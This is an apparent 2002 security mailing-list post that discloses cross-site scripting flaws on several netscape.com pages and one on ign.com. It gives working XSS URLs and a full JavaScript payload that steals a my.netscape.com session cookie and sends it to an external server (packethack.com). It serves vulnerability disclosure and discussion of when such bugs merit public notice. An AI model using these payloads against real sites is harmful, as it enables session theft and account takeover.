I think it's important to notify the public about CSS vulnerabilities when a certain threshhold of severity is reached. Who decides what is severe? That probably falls in the lap of the list moderator. I've found quite a few of these vulnerabilites but most of them are, in my mind, insignificant. Most of the sites I have found vulnerabilities in don't store anything sensitive in cookies, arn't used as a public forum (message board), don't authenticate users, or they simply arn't "main stream" enough. In these cases it's enough to send the admins of such domains an email and move on. With this in mind, a few weeks ago I found four CSS vulnerabilities in netscape.com: http://pfquotes.netscape.com/finance/quotes/quotes.tmpl?symbol=');alert('test http://search.netscape.com/search.psp?search=";><script>alert('test')</script> http://yp.netscape.com/setlocation.adp?addressloc=";><script>alert('test')</script> http://webcenter.newssearch.netscape.com/aolns_search.adp?query=";><script>alert('test')</script> and constructed a URL that demonstrates theft of my.netscape.com cookies. Set up a my.netscape.com account, then go here: <IMPORTANT NOTE> This will send the contents of your cookie to packethack.com simply to display the contents of your cookie and to demonstrate how cookies can be sent to remote servers. </IMPORTANT NOTE> http://search.netscape.com/search.psp?search=";><script>function gcv(os){var endstr=document.cookie.indexOf("/",os);if(endstr==-1)endstr=document.cookie.length;return unescape(document.cookie.substring(os,endstr));}function gc(n){var arg=n%2B"=";var alen=arg.length;var clen=document.cookie.length;var i=0;while(i<clen){var j=i%2Balen;if(document.cookie.substring(i,j)==arg)return gcv(j);i=document.cookie.indexOf(" ",i)%2B1;if(i==0)break;}return null;}window.document.location.href="http://www.packethack.com/cgi-bin/css_snarf.pl?val="%2Bgc('NSCPHPAD1');</script> I have noticed that the cookie name occasionally changes from NSCPHPAD1 so you may need to play with that. Netscape was contacted about this awhile ago but I never recieved a response. Now, is this important enough to send to bugtraq? I guess I'll find out in the AM. -Blake On Tue, 5 Feb 2002, [iso-8859-1] Knud Erik Højgaard wrote: > To add to the late plethora of CSS bugs, ign.com has some too. > > 'Vendor' contacted about a week ago at various mailaddresses, no reply. > > visiting http://mediaviewer.ign.com/mediaPage.jsp?object_id=15984&media_type=P&ign_section=17&adtag=network%3Dign%26site%3Dps2viewer%26adchannel%3Dps2%26pagetype%3Darticle&page_title=knud+fighter+4 > > will show you some screenshots from 'knud fighter 4' (really virtua fighter 4 shots).. the &page_title=blabla doesn't filter <tags> so it's possible to steal cookies and whatnot.. I haven't tried in the members section, since i can't really access it without an account, but i assume it uses the same files since ps2.ign.com/pc.ign.com/pocket.ign.com all utilize mediaviewer.ign.com/mediaPage.jsp for their media (p)reviews. > > random thought: is bugtraq really the correct place for css bugs? many vulnerable scripts are 'homemade' .. so it's not like there's much value in reporting 'site x has css bug in blah.php' .. > > -Knud >
